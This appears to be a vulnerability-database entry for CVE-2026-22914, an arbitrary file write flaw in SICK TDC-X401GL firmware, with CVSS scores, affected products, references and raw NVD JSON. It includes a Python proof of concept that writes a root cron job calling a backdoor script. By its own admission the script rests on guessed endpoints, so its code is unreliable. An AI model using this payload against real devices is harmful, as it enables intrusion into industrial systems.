Security Vulnerability Report
CVE-2026-22914 CVSS 4.3 MEDIUM

CVE-2026-22914

Published: 2026-01-15 13:16:06
Last Modified: 2026-01-23 15:27:46

Description

An attacker with limited permissions may still be able to write files to specific locations on the device, potentially leading to system manipulation.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Note: the 4.3 score above is the Secondary assessment. The Primary assessment (NVD's analysis, see the raw JSON below) rates integrity impact HIGH instead of LOW (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N), giving a base score of 6.5 MEDIUM; prioritise patching with the higher figure in mind.
Weakness: CWE-266 (Incorrect Privilege Assignment) per the Secondary source; NVD classifies it as NVD-CWE-Other.

Configurations (Affected Products)

cpe:2.3:o:sick:tdc-x401gl_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sick:tdc-x401gl:-:*:*:*:*:*:*:* - NOT VULNERABLE
SICK: specific firmware versions of the SICK TDC-X401GL are affected; refer to the official vendor advisory for the exact version range.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-22914 PoC - SICK Device Arbitrary File Write
# Note: This is a conceptual PoC based on the vulnerability description.
# The /api/login and /api/file/write endpoints and the JSON field names
# are assumptions, not taken from the vendor advisory.
# Requires authentication with a low-privilege account.
import requests

TARGET_HOST = "https://target-device.local"
USERNAME = "low_priv_user"
PASSWORD = "password"
TARGET_PATH = "/etc/cron.d/malicious_script"


def exploit_cve_2026_22914():
    """
    Exploit for arbitrary file write vulnerability in SICK devices.
    The vulnerability allows authenticated users with low privileges
    to write files to arbitrary locations on the device.
    """
    # Authentication
    session = requests.Session()
    login_data = {
        'username': USERNAME,
        'password': PASSWORD
    }

    # Login to obtain session
    login_url = f"{TARGET_HOST}/api/login"
    response = session.post(login_url, json=login_data)
    if response.status_code != 200:
        print("[-] Authentication failed")
        return False
    print("[+] Successfully authenticated")

    # File write payload
    malicious_content = "#!/bin/bash\n# Malicious cron job\n* * * * * root /tmp/backdoor.sh"

    # Exploit the arbitrary file write vulnerability
    # Target specific file writing endpoint
    write_url = f"{TARGET_HOST}/api/file/write"
    exploit_data = {
        'path': TARGET_PATH,
        'content': malicious_content,
        'overwrite': True
    }
    response = session.post(write_url, json=exploit_data)
    if response.status_code == 200:
        print(f"[+] File successfully written to {TARGET_PATH}")
        print("[+] System may now be compromised")
        return True
    else:
        print(f"[-] Exploitation failed: {response.status_code}")
        return False


if __name__ == "__main__":
    print("CVE-2026-22914 PoC - SICK Device Arbitrary File Write")
    exploit_cve_2026_22914()
```

References

- https://sick.com/psirt (Vendor Advisory)
- https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json (Vendor Advisory, CSAF)
- https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf (Vendor Advisory, PDF)
- https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf (Product: SICK cybersecurity operating guidelines)
- https://www.cisa.gov/resources-tools/resources/ics-recommended-practices (US Government Resource)
- https://www.first.org/cvss/calculator/3.1 (Not Applicable)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-22914",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-15T13:16:06.250",
    "lastModified": "2026-01-23T15:27:45.867",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "An attacker with limited permissions may still be able to write files to specific locations on the device, potentially leading to system manipulation."},
      {"lang": "es", "value": "Un atacante con permisos limitados aún podría ser capaz de escribir archivos en ubicaciones específicas en el dispositivo, potencialmente llevando a la manipulación del sistema."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]},
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}
    ],
    "configurations": [
      {
        "operator": "AND",
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:o:sick:tdc-x401gl_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "59BB5012-A895-4A93-B36F-A062A9389DB1"}
            ]
          },
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": false, "criteria": "cpe:2.3:h:sick:tdc-x401gl:-:*:*:*:*:*:*:*", "matchCriteriaId": "9A95E220-0816-4885-AB7C-D0BB6F27DB7A"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]},
      {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]},
      {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]},
      {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json", "source": "[email protected]", "tags": ["Vendor Advisory"]},
      {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]},
      {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}
    ]
  }
}